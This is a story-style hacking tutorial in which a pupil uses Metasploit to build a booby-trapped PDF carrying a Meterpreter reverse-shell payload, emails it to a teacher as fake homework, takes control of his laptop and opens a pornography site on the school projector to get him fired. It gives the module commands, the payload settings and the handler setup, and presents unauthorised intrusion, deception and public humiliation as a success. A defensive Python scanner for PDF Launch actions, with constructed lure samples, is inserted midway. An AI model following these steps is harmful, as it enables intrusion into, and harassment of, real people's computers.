Real Scenarios #2: The Creepy Teacher [Part 2]
In part one of this tutorial we found out that your English teacher is a paedophile, by using a Man in the Middle attack to intercept his internet traffic.
Now you're faced with the dilemma of how to alert other staff at the school to how creepy he is without letting on that you've been sniffing around the school network...
You need a way to tell the other staff what you've found, without them suspecting that you're involved.
A good start would be to get control of his computer, so you do some reconnaissance looking for a way in, but you don't come up with anything.
One day in a lesson, you see him open a PDF on the projector, using Adobe Reader 9!
Since you've practised against Reader 9 in your Virtual Hacking Lab at home, you know that it will run an executable hidden inside a PDF: the PDF carries a Launch action that fires as soon as the file is opened, and all the victim has to do is click through the warning dialog (later updates to Reader 9 refuse to launch embedded executables, so this only works on an unpatched install).
If you can build such a PDF and get him to open it, you can take control of his computer!
You're going to use Metasploit to create the malicious PDF, so you open the Metasploit console from the terminal.
Once the Metasploit Framework has loaded up, you type
- use exploit/windows/fileformat/adobe_pdf_embedded_exe
to select the appropriate exploit, then use
- set payload windows/meterpreter/reverse_tcp
to set the payload.
You need a harmless PDF for Metasploit to embed the payload in. Reader 9 can only display PDFs, not author them, so you create answers.pdf with whatever PDF-producing tool you have, check that it opens cleanly in Reader 9, then feed it to Metasploit:
- set INFILENAME answers.pdf
- set FILENAME answers.pdf
to set the input and output file names, and then it's simply a case of providing the IP address of your own laptop on the school network for the payload to connect back to (it has to be reachable from his machine, and the handler you start later must use the same address and port):
- set LHOST 192.168.1.78
Running the module then writes the PDF to /root/.msf4/local/answers.pdf
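To see what the PDF is actually asking Reader to do, and to check a file like answers.pdf before it goes anywhere, here is an added example (it is not part of the original write-up and not the Metasploit module's code): a small Python triage scanner that counts the PDF name tokens that matter for this class of lure (/OpenAction, /AA, /Launch, /JS, /JavaScript, /EmbeddedFile), undoes the #xx name-escaping trick used to dodge naive grepping, and pulls the program and arguments out of every /Launch action dictionary. The three sample PDFs are constructed for the example; the object layout, file names and prompt text are assumptions, and the real module's output differs in its details.

```python
"""Triage scanner for PDF Launch-action lures (added example, not the page's or Metasploit's code)."""
import re
import sys

# Name tokens that matter for this class of lure. /OpenAction and /AA fire an action
# automatically when the document, page or field is opened; /Launch runs an external
# program; /JS and /JavaScript are the other common trigger; /EmbeddedFile is the
# attachment that carries a dropped payload.
INDICATORS = (b"/OpenAction", b"/AA", b"/Launch", b"/JavaScript", b"/JS", b"/EmbeddedFile")

# Constructed sample: a minimal PDF whose OpenAction is a Launch action that runs an
# embedded executable through cmd.exe. The object layout, filenames and command are
# assumptions for the example; the Metasploit module's real output differs.
SAMPLE_LAUNCH_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R /Names << /EmbeddedFiles << /Names [(answers.exe) 6 0 R] >> >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
5 0 obj << /Type /Action /S /Launch /Win << /F (cmd.exe) /P (/c start answers.exe) >> >> endobj
6 0 obj << /Type /Filespec /F (answers.exe) /EF << /F 7 0 R >> >> endobj
7 0 obj << /Type /EmbeddedFile /Length 4 >> stream
MZ\x90\x00
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Same lure with the Launch name hex-escaped (/L#61unch), a trick that defeats a plain grep.
SAMPLE_OBFUSCATED_PDF = SAMPLE_LAUNCH_PDF.replace(b"/Launch", b"/L#61unch")

# Constructed benign document with no actions at all.
SAMPLE_CLEAN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""


def normalise_names(data: bytes) -> bytes:
    """Undo PDF name hex-escaping (/L#61unch -> /Launch) so escaped names are still counted."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def count_indicators(data: bytes) -> dict:
    """Count each indicator name; the lookahead stops /EmbeddedFiles matching /EmbeddedFile."""
    data = normalise_names(data)
    return {name.decode(): len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", data))
            for name in INDICATORS}


def launch_commands(data: bytes) -> list:
    """Return (program, parameters) for every /Launch action dictionary.

    Only plain literal strings are handled (no escaped parentheses or hex strings);
    this is a triage tool, not a full PDF parser.
    """
    data = normalise_names(data)
    found = []
    for body in re.findall(rb"\bobj\b(.*?)\bendobj\b", data, re.DOTALL):
        if not re.search(rb"/S\s*/Launch(?![A-Za-z0-9])", body):
            continue
        prog = re.search(rb"/F\s*\(([^)]*)\)", body)
        params = re.search(rb"/P\s*\(([^)]*)\)", body)
        found.append((prog.group(1).decode("latin-1") if prog else "",
                      params.group(1).decode("latin-1") if params else ""))
    return found


def scan_pdf(data: bytes) -> dict:
    """Combine the counts into a verdict with human-readable reasons."""
    counts = count_indicators(data)
    reasons = []
    if counts["/Launch"] and (counts["/OpenAction"] or counts["/AA"]):
        reasons.append("Launch action wired to an automatic trigger")
    elif counts["/Launch"]:
        reasons.append("Launch action present")
    if counts["/Launch"] and counts["/EmbeddedFile"]:
        reasons.append("embedded file alongside a Launch action (dropper pattern)")
    if counts["/JavaScript"] or counts["/JS"]:
        reasons.append("JavaScript present")
    return {"indicators": counts, "launch_commands": launch_commands(data),
            "suspicious": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    # Scan a file given on the command line, otherwise the constructed samples.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            targets = {sys.argv[1]: fh.read()}
    else:
        targets = {"launch": SAMPLE_LAUNCH_PDF, "obfuscated": SAMPLE_OBFUSCATED_PDF,
                   "clean": SAMPLE_CLEAN_PDF}
    for label, pdf in targets.items():
        print(label, scan_pdf(pdf))
```

Run it as `python3 scan.py /root/.msf4/local/answers.pdf` to see the Launch command that Reader will show in its warning dialog; that dialog is the only thing between the victim and the payload, which is why the module lets you set the text that appears in it. Didier Stevens' pdfid.py does the same keyword counting more thoroughly and is the tool to reach for on a real sample.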
Now that you have your PDF, you need to somehow get your teacher to open it.
You decide to email it to him one lunchtime, telling him that it contains your homework answers.
You sneak off and, before sending the email, start a Metasploit handler to catch the connection back from his computer, so that it's already listening when he opens the attachment. You type
- use exploit/multi/handler
at the Metasploit prompt.
You configure the options to match what was baked into the PDF (the same payload and LHOST, and the same LPORT if you changed it from the default):
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.1.78
Then run the handler and wait for him to open the attachment:
After a few minutes, you get a connection!
Straight after, you email him a document with your actual homework in it, saying you accidentally sent an empty document, so he doesn't suspect anything.
Success! You have control of his computer!
Now how can you use that fact to get him fired?
It's assembly tomorrow, and the whole school, staff and pupils, will be in one room, and guess what? The English teacher is doing a short PowerPoint presentation about how to write applications (no, not that type of application) for college. If only you could get something less desirable than his presentation to appear on the projector...
The stage is set!
The day comes, and you're sitting at the back of the hall watching the headteacher drone on about grades. She finishes, and as your English teacher stands up and plugs his laptop into the projector to begin his presentation, you slip out of the door at the back of the hall.
Run Run Run!
You grab your laptop from your locker, then type this into a command shell on his computer (now plugged into the projector), spawned from the Meterpreter session:
- explorer "http://pornhub.com"
You hit enter, and smile as you imagine the scene in the hall as his default browser (probably Internet Explorer, another reason to fire him) cheerfully pops up and displays pornhub.com on the projector. It lands on the projector because the payload was started by his own click in his logged-in desktop session, so anything it launches appears on the desktop he's presenting from.
It might not be concrete evidence, but it's enough to get an investigation started, and that's all you need.
Two days later, he's fired. Good Job.